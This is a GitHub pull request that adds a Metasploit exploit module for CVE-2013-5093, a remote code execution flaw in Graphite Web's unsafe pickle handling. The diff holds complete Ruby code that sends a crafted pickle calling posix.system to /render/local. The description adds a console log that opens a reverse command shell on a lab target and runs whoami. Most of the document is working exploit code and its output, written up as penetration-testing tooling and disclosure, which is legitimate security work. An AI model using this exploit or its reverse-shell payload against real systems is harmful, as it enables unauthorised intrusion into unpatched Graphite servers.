### PR TITLE
Adding module for CVE 2013-5093, Graphite Web Exploit

### DIFF
--- a/modules/exploits/unix/webapp/graphite_pickle_exec.rb
+++ b/modules/exploits/unix/webapp/graphite_pickle_exec.rb
@@ -1,0 +1,78 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name' 			=> 'Graphite Web Unsafe Pickle Handling',
+			'Description' 	=> %q{
+					This module exploits a remote code execution vulnerability in the
+				pickle handling of the rendering code in the Graphite Web project between
+				version 0.9.5 and 0.9.10(both included).
+			},
+			'Author' 		=>	
+				[
+					'Charlie Eriksen' # Initial discovery and exploit
+				],
+			'License' 		=> MSF_LICENSE,
+			'References'    =>
+				[
+					[ 'CVE', '2013-5093'],
+					[ 'URL', 'http://ceriksen.com/2013/08/20/graphite-remote-code-execution-vulnerability-advisory/']
+				],
+			'Platform' 		 => 'unix',
+			'Arch' 			 => ARCH_CMD,
+			'Privileged' 	 => false,
+			'Targets'		 => [ ['Automatic', {} ] ],
+			'DisclosureDate' => 'Aug 20 2013',
+			'DefaultTarget'  => 0,
+			'Payload'		 =>
+				{
+					'DisableNops' => true,
+					'Space'		  => 16384,
+					'Compat'	  =>
+						{
+							'PayloadType' => 'cmd',
+							'RequiredCmd' => 'python generic telnet netcat perl ruby'
+						}
+				}))
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [ true, 'The path to a vulnerable application', '/'])
+			], self.class)
+
+	end
+
+	def check
+		response = send_request_cgi({
+			'uri' 	 => normalize_uri(target_uri.path, 'render', 'local'),
+			'method' => 'POST'
+		})
+
+		if response.code != 200
+			return Exploit::CheckCode::Appears
+		end
+		return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+		data = "line\ncposix\nsystem\np1\n(S'#{payload.encoded}'\np2\ntp3\nRp4\n."
+		response = send_request_cgi({
+			'uri' 	 => normalize_uri(target_uri.path, 'render', 'local'),
+			'method' => 'POST',
+			'data' 	 => data
+		})
+		print_status("Sent exploit payload")
+	end
+end


### PR DESCRIPTION
# Application

Graphite web: http://graphite.wikidot.com/

Versions affected: 0.9.5 up till and including 0.9.10

Installation guide: https://gist.github.com/jgeurts/3112065
# Analysis

The vulnerability was introduced in: https://github.com/graphite-project/graphite-web/commit/71d395ee68c156da00504cb41d353980e0afb470

Note that in webapp/web/render/views.py, which is a publicly accessible URL by default(I have found no way of restricting access), a pickle can be loaded. Pickles are unsafe as they can contain commands that will be executed.

The routing for the exploit goes as following, as defined in webapp/web/render/views.py:

/render/local

The request to trigger it has to formatted like:

[Chart type]

[Pickle]

Chart type, as an example, can be "line". This is then followed by a linebreak and then the pickle.
# Usage

<pre>
msf > use exploit/unix/webapp/graphite_pickle_exec 
msf exploit(graphite_pickle_exec) > show options

Module options (exploit/unix/webapp/graphite_pickle_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The path to a vulnerable application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(graphite_pickle_exec) > set RHOST 192.168.80.149
RHOST => 192.168.80.149
msf exploit(graphite_pickle_exec) > check
[*] The target appears to be vulnerable.
msf exploit(graphite_pickle_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 39Dm9uxcphKQ5GwX;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "39Dm9uxcphKQ5GwX\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.80.129:4444 -> 192.168.80.149:57141) at 2013-08-07 19:14:59 -0400

whoami
www-data
</pre>
